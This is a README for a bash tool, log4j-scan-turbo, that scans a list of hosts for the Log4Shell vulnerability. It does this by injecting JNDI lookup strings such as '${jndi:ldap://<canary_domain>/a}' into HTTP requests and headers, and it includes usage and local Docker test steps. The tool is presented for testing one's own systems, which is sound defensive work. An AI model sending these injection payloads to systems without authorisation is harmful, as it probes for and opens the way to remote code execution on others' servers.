log4j-scan-turbo
log4j-scan-turbo copied to clipboard
Multithreaded log4j vulnerability scanner using only bash! Tests all JNDI protocols, HTTP GET/POST, and 84 headers.
log4j-scan-turbo (Multi-threaded scanner)
Test for the log4j vulnerability ( CVE-2021-44228 ) across your external footprint.
This is a very fast, multi-threaded, log4j vulnerability tester.
Details
- Pure bash scanner
- Uses nohup and curl to achieve multiple threads
- Curl configured to use a 3 second client to server maximum and six second total time setting.
- 48 parallel calls at a time
- Covers all jndi protocols
- HTTP GET/POST methods
Example Use
git clone https://github.com/ssstonebraker/log4j-scan-turbo
cd log4j-scan-turbo
sudo ./log4j_CVE-2021-44228_tester.sh <INPUT_FILE> <CANARY_DOMAIN>
Payloads
Payloads:
${jndi:ldap://<canary_domain>/a}
${jndi:ldaps://<canary_domain>/a}
${jndi:rmi://<canary_domain>/a}
${jndi:dns://<canary_domain>/a}
${jndi:corba://<canary_domain>/a}
${jndi:iiop://<canary_domain>/a}
${jndi:nis://<canary_domain>/a}
${jndi:nds://<canary_domain>/a}
Methods
HTTP GET and HTTP POST are called on TCP 80/443 for each ip/domain provided in the input file
Requirements
You will need:
- An inputfile with a list of IP addresses/domains (one per line)
- A Canary Token (see below)
Input File
Your input file should consist of IP address and/or Fully Qualified Domain Names
Example:
foo.com
bar.com
10.1.100.50
127.0.0.1:5000
Get a Canary Domain
- Browse to https://canarytokens.org/generate#
- Selection Option "DNS"
- Input Email Address
- Input Comment
- Hit "Create my Canary Token"
data:image/s3,"s3://crabby-images/c0b69/c0b69d8a5bc5934881f997a84d8193712211b731" alt="image"
False Positives
If you use egress SSL decryption + inspection this script may trigger false positives (as your IDS may perform lookups on the canary token.. thus triggering it).
If this is the case then you are better off running it from a cloud instance that is not being inspected.
Local Testing
Spin up a docker image of a vulnerable server:
docker run --name vulnerable-app -p 555:8080 ghcr.io/christophetd/log4shell-vulnerable-app
Use the script to test locally:
echo "localhost:555" > ips.txt
sudo ./log4j-scan-turbo.sh ips.txt <canary_domain>